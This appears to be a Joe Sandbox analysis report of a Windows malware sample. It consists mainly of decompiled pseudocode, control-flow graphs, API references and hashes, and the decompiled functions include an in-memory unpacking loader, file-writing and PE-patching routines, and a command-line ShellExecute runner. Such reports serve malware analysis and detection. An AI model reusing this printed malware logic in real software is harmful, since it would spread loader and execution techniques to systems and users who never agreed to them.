                                                                                control_flow_graph 640 208003c-2080047 641 2080049 640->641 642 208004c-2080263 call 2080a3f call 2080e0f call 2080d90 VirtualAlloc 640->642 641->642 657 208028b-2080292 642->657 658 2080265-2080289 call 2080a69 642->658 659 20802a1-20802b0 657->659 662 20802ce-20803c2 VirtualProtect call 2080cce call 2080ce7 658->662 659->662 663 20802b2-20802cc 659->663 669 20803d1-20803e0 662->669 663->659 670 2080439-20804b8 VirtualFree 669->670 671 20803e2-2080437 call 2080ce7 669->671 672 20804be-20804cd 670->672 673 20805f4-20805fe 670->673 671->669 675 20804d3-20804dd 672->675 676 208077f-2080789 673->676 677 2080604-208060d 673->677 675->673 681 20804e3-2080505 LoadLibraryA 675->681 679 208078b-20807a3 676->679 680 20807a6-20807b0 676->680 677->676 682 2080613-2080637 677->682 679->680 684 208086e-20808be LoadLibraryA 680->684 685 20807b6-20807cb 680->685 686 2080517-2080520 681->686 687 2080507-2080515 681->687 688 208063e-2080648 682->688 692 20808c7-20808f9 684->692 689 20807d2-20807d5 685->689 690 2080526-2080547 686->690 687->690 688->676 691 208064e-208065a 688->691 693 2080824-2080833 689->693 694 20807d7-20807e0 689->694 695 208054d-2080550 690->695 691->676 696 2080660-208066a 691->696 697 20808fb-2080901 692->697 698 2080902-208091d 692->698 704 2080839-208083c 693->704 699 20807e2 694->699 700 20807e4-2080822 694->700 701 20805e0-20805ef 695->701 702 2080556-208056b 695->702 703 208067a-2080689 696->703 697->698 699->693 700->689 701->675 705 208056d 702->705 706 208056f-208057a 702->706 707 208068f-20806b2 703->707 708 2080750-208077a 703->708 704->684 709 208083e-2080847 704->709 705->701 711 208059b-20805bb 706->711 712 208057c-2080599 706->712 713 20806ef-20806fc 707->713 714 20806b4-20806ed 707->714 708->688 715 2080849 709->715 716 208084b-208086c 709->716 723 20805bd-20805db 711->723 712->723 717 208074b 713->717 718 20806fe-2080748 713->718 714->713 715->684 716->704 717->703 718->717 723->695
                                                                                APIs
                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0208024D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID: cess$kernel32.dll
                                                                                • API String ID: 4275171209-1230238691
                                                                                • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                • Instruction ID: 094ada9956a38843da231dd86c67634bf040858582ffe9a2bc1163de5be843d6
                                                                                • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                • Instruction Fuzzy Hash: 7D527A75A01229DFDBA4CF58C984BADBBB1BF09304F1480D9E54DAB351DB30AA89DF14
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                C-Code - Quality: 46%
                                                                                			E004099D2(int __edx, void* __eflags, CHAR* _a4, CHAR* _a8, CHAR* _a12, intOrPtr _a16, int _a20) {
                                                                                				signed int _t14;
                                                                                				void* _t21;
                                                                                				CHAR* _t22;
                                                                                				void* _t24;
                                                                                				int _t25;
                                                                                
                                                                                				_t25 = __edx;
                                                                                				_t22 = _a8;
                                                                                				lstrcpyA(_t22, _a4);
                                                                                				E00408274(_t22);
                                                                                				_push(0);
                                                                                				_push(_a12);
                                                                                				_t14 = E00406C6F((E0040ECA5() & 0x0000000f) << 0x00000014 | 0x00006104);
                                                                                				_pop(_t24);
                                                                                				_push(_t14 ^ 0x61616161);
                                                                                				E0040F133();
                                                                                				lstrcatA(_a12, E00402544(0x4122f8, 0x410694, 5, 0xe4, 0xc8));
                                                                                				E0040EE2A(_t24, 0x4122f8, 0, 0x100);
                                                                                				lstrcatA(_t22, _a12);
                                                                                				_t21 = E00406A60(_t25, _t22, _a16, _a20); // executed
                                                                                				return _t21;
                                                                                			}
                                                                                Instruction addresses (decompiler line-to-address column, shown here as one list): 0x004099d2, 0x004099d6, 0x004099df, 0x004099e6, 0x004099ec, 0x004099ee, 0x00409a02, 0x00409a07, 0x00409a0d, 0x00409a0e, 0x00409a3c, 0x00409a46, 0x00409a52, 0x00409a5b, 0x00409a67

                                                                                APIs
                                                                                • lstrcpyA.KERNEL32(?,?,00000100,PromptOnSecureDesktop,00000000,?,00409E9D,?,00000022,?,?,?,?,?,?,?), ref: 004099DF
                                                                                • lstrcatA.KERNEL32(00000022,00000000,?,?,00409E9D,?,00000022,?,?,?,?,?,?,?,000001F4), ref: 00409A3C
                                                                                • lstrcatA.KERNEL32(?,00000022,?,?,?,?,?,00409E9D,?,00000022,?,?,?), ref: 00409A52
                                                                                  • Part of subcall function 00406A60: CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,74CF81D0,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406A7D
                                                                                  • Part of subcall function 00406A60: GetDiskFreeSpaceA.KERNELBASE(00409E9D,00409A60,?,?,?,PromptOnSecureDesktop,?,?,?,00409A60,?,?,00409E9D), ref: 00406ABB
                                                                                  • Part of subcall function 00406A60: GetLastError.KERNEL32(?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B40
                                                                                  • Part of subcall function 00406A60: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B4E
                                                                                  • Part of subcall function 00406A60: DeleteFileA.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B80
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Filelstrcat$CloseCreateDeleteDiskErrorFreeHandleLastSpacelstrcpy
                                                                                • String ID: PromptOnSecureDesktop
                                                                                • API String ID: 4131120076-2980165447
                                                                                • Opcode ID: d80e02e7f2340feb2838cd3820060c46ea291b30a9194021c2dcc5ff6a6d6240
                                                                                • Instruction ID: 4ed420c39325858c4d47b9b9ee3d8ab97b09bc1ac19655b46481edbef4575242
                                                                                • Opcode Fuzzy Hash: d80e02e7f2340feb2838cd3820060c46ea291b30a9194021c2dcc5ff6a6d6240
                                                                                • Instruction Fuzzy Hash: 25018F7294020877EA106F62AC47F9F3E1DEB44718F04883AF619790D2D9BA94709A6C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph (legend: Executed / Not Executed)
                                                                                control_flow_graph 739 404000-404008 740 40400b-40402a CreateFileA 739->740 741 404057 740->741 742 40402c-404035 GetLastError 740->742 743 404059-40405c 741->743 744 404052 742->744 745 404037-40403a 742->745 746 404054-404056 743->746 744->746 745->744 747 40403c-40403f 745->747 747->743 748 404041-404050 Sleep 747->748 748->740 748->744
                                                                                C-Code - Quality: 100%
                                                                                			E00404000(CHAR* _a4, signed int* _a8) {
                                                                                				void* _t3;
                                                                                				long _t6;
                                                                                				void* _t8;
                                                                                				signed int* _t9;
                                                                                
                                                                                				_t9 = _a8;
                                                                                				_t8 = 0;
                                                                                				 *_t9 =  *_t9 | 0xffffffff;
                                                                                				while(1) {
                                                                                					_t3 = CreateFileA(_a4, 0xc0000000, 3, 0, 3, 0x40000080, 0); // executed
                                                                                					if(_t3 != 0xffffffff) {
                                                                                						break;
                                                                                					}
                                                                                					_t6 = GetLastError();
                                                                                					if(_t6 == 2 || _t6 == 3) {
                                                                                						L6:
                                                                                						return 0;
                                                                                					} else {
                                                                                						if(_t6 == 5) {
                                                                                							L9:
                                                                                							return 1;
                                                                                						}
                                                                                						Sleep(0x1f4);
                                                                                						_t8 = _t8 + 1;
                                                                                						if(_t8 < 0xa) {
                                                                                							continue;
                                                                                						}
                                                                                						goto L6;
                                                                                					}
                                                                                				}
                                                                                				 *_t9 = _t3;
                                                                                				goto L9;
                                                                                			}
                                                                                Instruction addresses (decompiler line-to-address column, shown here as one list): 0x00404001, 0x00404006, 0x00404008, 0x0040400b, 0x00404021, 0x0040402a, 0x00000000, 0x00000000, 0x0040402c, 0x00404035, 0x00404052, 0x00000000, 0x0040403c, 0x0040403f, 0x00404059, 0x00000000, 0x0040405b, 0x00404046, 0x0040404c, 0x00404050, 0x00000000, 0x00000000, 0x00000000, 0x00404050, 0x00404035, 0x00404057, 0x00000000

                                                                                APIs
                                                                                • CreateFileA.KERNELBASE(40000080,C0000000,00000003,00000000,00000003,40000080,00000000,00000001,PromptOnSecureDesktop,004042B6,00000000,00000001,PromptOnSecureDesktop,00000000,?,004098FD), ref: 00404021
                                                                                • GetLastError.KERNEL32(?,004098FD,00000001,00000100,PromptOnSecureDesktop,0040A3C7), ref: 0040402C
                                                                                • Sleep.KERNEL32(000001F4,?,004098FD,00000001,00000100,PromptOnSecureDesktop,0040A3C7), ref: 00404046
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateErrorFileLastSleep
                                                                                • String ID: PromptOnSecureDesktop
                                                                                • API String ID: 408151869-2980165447
                                                                                • Opcode ID: 6f680220710ad79833a0587a74a8d4d803d4b32c880204d479e51cf724750932
                                                                                • Instruction ID: 3804347f6bd7ba573f3b83e06e35dce69dd086f5e0a34025cfebbc3953b0dfe0
                                                                                • Opcode Fuzzy Hash: 6f680220710ad79833a0587a74a8d4d803d4b32c880204d479e51cf724750932
                                                                                • Instruction Fuzzy Hash: 05F0A771240101AAD7311B24BC49B5B36A1DBC6734F258B76F3B5F21E0C67458C19B1D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

Control-flow Graph (rendered graph and edge list omitted)
                                                                                C-Code - Quality: 97%
                                                                                			E00406987(void* __ecx, void* _a4, void* _a8, intOrPtr _a12, signed int _a16) {
                                                                                				long _v8;
                                                                                				long _v12;
                                                                                				signed int _t50;
                                                                                				int _t52;
                                                                                				signed int _t53;
                                                                                				int _t59;
                                                                                				signed int _t60;
                                                                                				long _t68;
                                                                                				signed int _t74;
                                                                                				void* _t78;
                                                                                				void* _t85;
                                                                                
                                                                                				_t78 = _a8;
                                                                                				_t48 =  *((intOrPtr*)(_t78 + 0x3c)) + _t78;
                                                                                				_t7 =  &_a16; // 0x406b2c
                                                                                				_t85 = (( *( *((intOrPtr*)(_t78 + 0x3c)) + _t78 + 6) & 0x0000ffff) - 1) * 0x28 + ( *(_t48 + 0x14) & 0x0000ffff) + _t48 + 0x18;
                                                                                				_t68 =  *(_t85 + 0x14);
                                                                                				_t50 =  *_t7 - _t68;
                                                                                				_v8 = _t50;
                                                                                				if(_t68 >= _a12) {
                                                                                					L5:
                                                                                					_a16 = _a16 & 0x00000000;
                                                                                				} else {
                                                                                					_t74 =  *(_t85 + 0x10);
                                                                                					if(_t74 == 0) {
                                                                                						goto L5;
                                                                                					} else {
                                                                                						_v12 = _t74;
                                                                                						_a16 = _t50 / _t74;
                                                                                						if(_a16 < 1) {
                                                                                							_a16 = 1;
                                                                                						}
                                                                                						_t20 =  &_a16; // 0x406b2c
                                                                                						 *(_t85 + 0x10) =  *_t20 * _t74;
                                                                                					}
                                                                                				}
                                                                                				_v8 = _v8 & 0x00000000;
                                                                                				_t52 = WriteFile(_a4, _t78, _t68,  &_v8, 0); // executed
                                                                                				if(_t52 == 0 || _v8 != _t68) {
                                                                                					if(_a16 != 0) {
                                                                                						 *(_t85 + 0x10) = _v12;
                                                                                					}
                                                                                					_t53 = 0;
                                                                                				} else {
                                                                                					if(_a16 == 0) {
                                                                                						L13:
                                                                                						_t53 = _t68;
                                                                                					} else {
                                                                                						 *(_t85 + 0x10) = _v12;
                                                                                						while(1) {
                                                                                							_v8 = _v8 & 0x00000000;
                                                                                							_t59 = WriteFile(_a4, _a8 +  *(_t85 + 0x14), _v12,  &_v8, 0); // executed
                                                                                							_t60 = _v8;
                                                                                							if(_t59 == 0 || _t60 != _v12) {
                                                                                								break;
                                                                                							}
                                                                                							_t68 = _t68 + _t60;
                                                                                							_t41 =  &_a16;
                                                                                							 *_t41 = _a16 - 1;
                                                                                							if( *_t41 != 0) {
                                                                                								continue;
                                                                                							} else {
                                                                                								goto L13;
                                                                                							}
                                                                                							goto L18;
                                                                                						}
                                                                                						asm("sbb eax, eax");
                                                                                						_t53 =  !_t60 & _t68 + _t60;
                                                                                					}
                                                                                				}
                                                                                				L18:
                                                                                				return _t53;
                                                                                			}


                                                                                APIs
                                                                                • WriteFile.KERNELBASE(00409A60,?,?,00000000,00000000,00409A60,?,00000000), ref: 004069F9
                                                                                • WriteFile.KERNELBASE(00409A60,?,00409A60,00000000,00000000), ref: 00406A27
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileWrite
                                                                                • String ID: ,k@
                                                                                • API String ID: 3934441357-1053005162
                                                                                • Opcode ID: e4aff9389b963f63373f6495f6f2d31144d691977fa3f05a849364ed3536fcbf
                                                                                • Instruction ID: 2e4882fff751b5905bcc38bfa2cd4d67bf9c642b42fdf425c00f27fbfd993b21
                                                                                • Opcode Fuzzy Hash: e4aff9389b963f63373f6495f6f2d31144d691977fa3f05a849364ed3536fcbf
                                                                                • Instruction Fuzzy Hash: 3A313A72A00209EFDB24DF58D984BAA77F4EB44315F12847AE802F7680D374EE64CB65
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

Control-flow Graph (rendered graph and edge list omitted)
                                                                                C-Code - Quality: 100%
                                                                                			E00406DC2(void* __ecx) {
                                                                                				char _v261;
                                                                                				char _v264;
                                                                                				intOrPtr _t6;
                                                                                				intOrPtr* _t10;
                                                                                				int _t13;
                                                                                				intOrPtr _t20;
                                                                                				void* _t21;
                                                                                
                                                                                				_t6 =  *0x412f0c;
                                                                                				if(_t6 == 0) {
                                                                                					E0040EF00( &_v264, E00406CC9(__ecx));
                                                                                					_t10 =  &_v264;
                                                                                					_t21 = _t10 + 1;
                                                                                					do {
                                                                                						_t20 =  *_t10;
                                                                                						_t10 = _t10 + 1;
                                                                                					} while (_t20 != 0);
                                                                                					if(_t10 - _t21 < 3) {
                                                                                						L5:
                                                                                						 *0x412f0c = 0x61616161;
                                                                                					} else {
                                                                                						_v261 = 0;
						_t13 = GetVolumeInformationA( &_v264, 0, 0, "\xef\xbf\xbd\%}", 0, 0, 0, 0);
						if(_t13 == 0) {
                                                                                							goto L5;
                                                                                						}
                                                                                					}
                                                                                					_t6 =  *0x412f0c;
                                                                                				}
                                                                                				return _t6;
                                                                                			}


                                                                                APIs
                                                                                  • Part of subcall function 00406CC9: GetModuleHandleA.KERNEL32(kernel32,GetSystemWow64DirectoryA,PromptOnSecureDesktop,000000E4,00406DDC,000000C8), ref: 00406CE7
                                                                                  • Part of subcall function 00406CC9: GetProcAddress.KERNEL32(00000000), ref: 00406CEE
                                                                                  • Part of subcall function 00406CC9: GetSystemDirectoryA.KERNEL32 ref: 00406D14
                                                                                  • Part of subcall function 00406CC9: GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 00406D2B
                                                                                • GetVolumeInformationA.KERNELBASE(?,00000000,00000000,00412F0C,00000000,00000000,00000000,00000000,000000C8), ref: 00406E1A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Directory$AddressHandleInformationModuleProcSystemVolumeWindows
                                                                                • String ID: \%}
                                                                                • API String ID: 1823874839-2294156228
                                                                                • Opcode ID: 345ca179d3c76e57dc7c5b3e21092807213ae32d0ff3695f39e28a6e5ad22b42
                                                                                • Instruction ID: 46d685041afc82653286dae93d5fe3173771f16ecf38a4b71df535c97c95e6ed
                                                                                • Opcode Fuzzy Hash: 345ca179d3c76e57dc7c5b3e21092807213ae32d0ff3695f39e28a6e5ad22b42
                                                                                • Instruction Fuzzy Hash: 55F028B9104218AFD710DB68DDC5ED777ADD704308F008476E242E3141D6B89D984B5C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

Control-flow Graph (rendered graph and edge list omitted)
                                                                                C-Code - Quality: 100%
                                                                                			E004091EB(char* _a4, char* _a8) {
                                                                                				signed int _v8;
                                                                                				signed int _v12;
                                                                                				char _v524;
                                                                                				char _t24;
                                                                                				char* _t25;
                                                                                				void* _t27;
                                                                                				intOrPtr* _t29;
                                                                                				char* _t31;
                                                                                				char _t34;
                                                                                				intOrPtr _t40;
                                                                                				void* _t41;
                                                                                				char* _t42;
                                                                                				void* _t44;
                                                                                				void* _t45;
                                                                                				void* _t46;
                                                                                
                                                                                				_v12 = _v12 & 0x00000000;
                                                                                				_t42 = _a8;
                                                                                				_v8 = 0x10;
                                                                                				if( *_t42 == 0) {
                                                                                					L33:
                                                                                					return _v12;
                                                                                				} else {
                                                                                					goto L1;
                                                                                				}
                                                                                				do {
                                                                                					L1:
                                                                                					_t31 = E0040ED03(_t42, 0xd);
                                                                                					if(_t31 != 0) {
                                                                                						L6:
                                                                                						_t44 = _t31 - _t42;
                                                                                						if(_t44 >= 0x200) {
                                                                                							_t44 = 0x1ff;
                                                                                						}
                                                                                						E0040EE08( &_v524, _t42, _t44);
                                                                                						_t46 = _t46 + 0xc;
                                                                                						 *((char*)(_t45 + _t44 - 0x208)) = 0;
                                                                                						if(_v524 == 0) {
                                                                                							goto L27;
                                                                                						} else {
                                                                                							_t25 =  &_v524;
                                                                                							if(_v524 != 0x20) {
                                                                                								L16:
                                                                                								while( *_t25 == 0x22) {
                                                                                									while(1) {
                                                                                										_t25 =  &(_t25[1]);
                                                                                										_t34 =  *_t25;
                                                                                										if(_t34 == 0) {
                                                                                											break;
                                                                                										}
                                                                                										if(_t34 == 0x22) {
                                                                                											L15:
                                                                                											_t25 =  &(_t25[1]);
                                                                                											goto L16;
                                                                                										}
                                                                                									}
                                                                                									if(_t34 != 0x22) {
                                                                                										L20:
                                                                                										while( *_t25 != 0) {
                                                                                											if( *_t25 == 0x20) {
                                                                                												L22:
                                                                                												 *_t25 = 0;
                                                                                												do {
                                                                                													_t25 =  &(_t25[1]);
                                                                                												} while ( *_t25 == 0x20);
                                                                                												L26:
                                                                                												_t27 = ShellExecuteA(0, _a4,  &_v524, _t25, 0, 0); // executed
                                                                                												_v12 = _t27;
                                                                                												if(_t27 != 0x2a) {
                                                                                													 *0x412180 = _v8 | 0x61040100;
                                                                                													 *0x41217c = _t27;
                                                                                													return _t27;
                                                                                												} else {
                                                                                													goto L27;
                                                                                												}
                                                                                												while(1) {
                                                                                													L27:
                                                                                													_t24 =  *_t31;
                                                                                													if(_t24 != 0xd && _t24 != 0xa) {
                                                                                														goto L30;
                                                                                													}
                                                                                													_t31 = _t31 + 1;
                                                                                												}
                                                                                												goto L30;
                                                                                											}
                                                                                											_t25 =  &(_t25[1]);
                                                                                										}
                                                                                										if( *_t25 != 0x20) {
                                                                                											_t25 = 0;
                                                                                											goto L26;
                                                                                										}
                                                                                										goto L22;
                                                                                									}
                                                                                									goto L15;
                                                                                								}
                                                                                								goto L20;
                                                                                							} else {
                                                                                								goto L10;
                                                                                							}
                                                                                							do {
                                                                                								L10:
                                                                                								_t25 =  &(_t25[1]);
                                                                                							} while ( *_t25 == 0x20);
                                                                                							goto L16;
                                                                                						}
                                                                                					}
                                                                                					_t31 = E0040ED03(_t42, 0xa);
                                                                                					if(_t31 != 0) {
                                                                                						goto L6;
                                                                                					}
                                                                                					_t29 = _t42;
                                                                                					_t5 = _t29 + 1; // 0x409689
                                                                                					_t41 = _t5;
                                                                                					do {
                                                                                						_t40 =  *_t29;
                                                                                						_t29 = _t29 + 1;
                                                                                					} while (_t40 != 0);
                                                                                					_t31 = _t29 - _t41 + _t42;
                                                                                					goto L6;
                                                                                					L30:
                                                                                					_t42 = _t31;
                                                                                					if( *_t31 != 0) {
                                                                                						Sleep(0x1f4); // executed
                                                                                					}
                                                                                					_v8 = _v8 + 1;
                                                                                				} while ( *_t31 != 0);
                                                                                				goto L33;
                                                                                			}

                                                                                APIs
                                                                                • ShellExecuteA.SHELL32(00000000,00000000,00000020,00000023,00000000,00000000), ref: 004092CF
                                                                                • Sleep.KERNELBASE(000001F4,00000000,00000000,000000C8), ref: 004092F6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExecuteShellSleep
                                                                                • String ID:
                                                                                • API String ID: 4194306370-0
                                                                                • Opcode ID: 2e9b8ee1aa82e5b19222b1e7c8dec86c7ad71102b6cc4d34520be7bdbd19ecb4
                                                                                • Instruction ID: b62c5ac478237f1abe85933658217c67db4fb14a75668cd30a6e7fb188506a69
                                                                                • Opcode Fuzzy Hash: 2e9b8ee1aa82e5b19222b1e7c8dec86c7ad71102b6cc4d34520be7bdbd19ecb4
                                                                                • Instruction Fuzzy Hash: 0E41EE718083497EEB269664988C7E73BA49B52300F2809FFD492B72D3D7BC4D818759
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
[Control-flow graph for 0x2080e0f-0x2080e2c (SetErrorMode called twice); node and edge list not rendered]
                                                                                APIs
                                                                                • SetErrorMode.KERNELBASE(00000400,?,?,02080223,?,?), ref: 02080E19
                                                                                • SetErrorMode.KERNELBASE(00000000,?,?,02080223,?,?), ref: 02080E1E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorMode
                                                                                • String ID:
                                                                                • API String ID: 2340568224-0
                                                                                • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                • Instruction ID: 0594162c44c975425590a9f4248303b472abad866a18c321087184769bf3c7dc
                                                                                • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                • Instruction Fuzzy Hash: 20D0123214522877D7413A94DC09BCE7B5CDF05B66F008011FB0DD9080C770954046E5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • TerminateProcess.KERNELBASE(000000FF,00000000), ref: 02080929
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ProcessTerminate
                                                                                • String ID:
                                                                                • API String ID: 560597551-0
                                                                                • Opcode ID: a81f69529bcf2872433a6626b6dddab0307a3207cad9c1e7665d850a07e5ea8b
                                                                                • Instruction ID: f1a77b98683cafb1fb7459b4dcf7902f75ab8b99c0f73db378513641b05b932d
                                                                                • Opcode Fuzzy Hash: a81f69529bcf2872433a6626b6dddab0307a3207cad9c1e7665d850a07e5ea8b
                                                                                • Instruction Fuzzy Hash: 1190026038415011D820259C4C02B0510021751634F3047107170B91D4D84496144126
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 007B9BB4
Memory Dump Source
• Source File: 00000000.00000002.290625632.00000000007B6000.00000040.00000020.00020000.00000000.sdmp, Offset: 007B6000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b6000_file.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
• Instruction ID: db4228a9ad10232db7fe455e9dc0af27eab818122aa5c1ae4400571a5ebbf1c1
• Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
• Instruction Fuzzy Hash: A0113C79A00208EFDB01DF98C985E99BBF5AF08751F058094FA589B362D375EA50DF81
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 88%
			E0040C913() {
				CHAR* _v8;
				CHAR* _v12;
				intOrPtr _v16;
				signed int _v17;
				signed int _v24;
				signed int _v35;
				CHAR* _v39;
				signed int _v52;
				long _v56;
				CHAR* _v60;
				CHAR* _v64;
				CHAR* _v68;
				signed int _v72;
				signed int _v76;
				char _v92;
				char _v96;
				long _v100;
				intOrPtr _v104;
				struct _PROCESS_INFORMATION _v120;
				char _v408;
				struct _PROCESS_INFORMATION _v424;
				char _v440;
				intOrPtr _v492;
				intOrPtr _v496;
				intOrPtr _v500;
				intOrPtr _v508;
				intOrPtr _v512;
				char _v640;
				intOrPtr _v688;
				intOrPtr _v720;
				intOrPtr _v728;
				intOrPtr _v732;
				CHAR* _v736;
				char _v740;
				struct _STARTUPINFOA _v808;
				struct _STARTUPINFOA _v876;
				char _v1176;
				void* __ebp;
				intOrPtr _t362;
				intOrPtr _t368;
				void* _t369;
				signed int _t388;
				signed int _t392;
				signed int _t395;
				signed int _t398;
				CHAR* _t403;
				signed int _t408;
				signed int _t409;
				signed int _t410;
				signed int _t413;
				signed int _t416;
				void* _t417;
				CHAR* _t418;
				signed int _t421;
				CHAR* _t428;
				signed int _t429;
				signed int _t434;
				signed int _t438;
				signed int _t439;
				signed int _t441;
				signed int _t449;
				signed int _t453;
				signed int _t456;
				signed int _t459;
				signed int _t462;
				signed int _t463;
				signed int _t467;
				signed int _t472;
				signed int _t473;
				signed int _t476;
				signed int _t478;
				signed int _t479;
				CHAR* _t483;
				signed int _t485;
				signed int _t488;
				signed int _t489;
				signed int _t491;
				CHAR* _t492;
				long _t494;
				signed int _t499;
				signed int _t500;
				signed int _t501;
				char* _t502;
				intOrPtr* _t513;
				signed int _t514;
				signed int _t527;
				signed int _t541;
				signed int _t545;
				signed int _t552;
				intOrPtr* _t559;
				signed int _t560;
				signed int _t571;
				signed int _t575;
				signed int _t579;
				signed int _t583;
				signed int _t588;
				signed char _t590;
				signed int _t591;
				intOrPtr* _t595;
				signed int _t596;
				signed int _t599;
				void* _t602;
				intOrPtr* _t607;
				char* _t609;
				CHAR* _t613;
				intOrPtr _t615;
				signed int _t616;
				signed int _t617;
				signed int _t618;
				signed int _t621;
				signed int _t624;
				CHAR* _t630;
				void* _t632;
				signed int _t634;
				CHAR* _t636;
				void* _t642;
				signed int _t644;
				void* _t651;
				int _t657;
				int _t673;
				signed int _t681;
				CHAR* _t686;
				intOrPtr _t688;
				void* _t695;
				signed int _t705;
				signed int _t709;
				signed int _t711;
				signed int _t712;
				signed int _t723;
				char* _t726;
				char _t733;
				char _t734;
				char* _t736;
				void* _t738;
				signed int _t747;
				signed int _t748;
				signed int _t758;
				signed int _t760;
				void* _t763;
				signed int _t764;
				signed int _t765;
				void* _t766;
				void* _t768;
				void* _t769;
				long _t770;
				void* _t773;
				void* _t774;
				void* _t775;
				intOrPtr* _t776;
				intOrPtr* _t777;
				void* _t779;
				void* _t781;
				void* _t782;
				signed int _t789;
				signed int _t791;
				signed int _t793;
				signed int _t795;
				CHAR* _t796;
				CHAR* _t797;
				signed int* _t798;
				signed int _t801;
				long _t803;
				signed int _t805;
				void* _t806;
				void* _t807;
				void* _t808;
				void* _t809;
				void* _t811;

				_v64 = 0;
				_v68 = 0;
				if( *0x41366c == 0 ||  *0x413670 == 0) {
					E0040C517();
				}
				if( *0x41366c == 0 ||  *0x413670 == 0) {
					L21:
					__eflags = 0;
					return 0;
				} else {
					 *0x412104 = E0040E819(1, "time_cfg", "wtm_c", 0x14);
					 *0x41210c = E0040E819(1, "time_cfg", "wtm_w", 0x28);
					_t362 = E0040E819(1, "time_cfg", "wtm_r", 0x28);
					_t808 = _t807 + 0x30;
					 *0x412108 = _t362;
					if( *0x4136b0 != 0) {
						L7:
						_t747 =  *0x413674;
						_t688 =  *0x41366c;
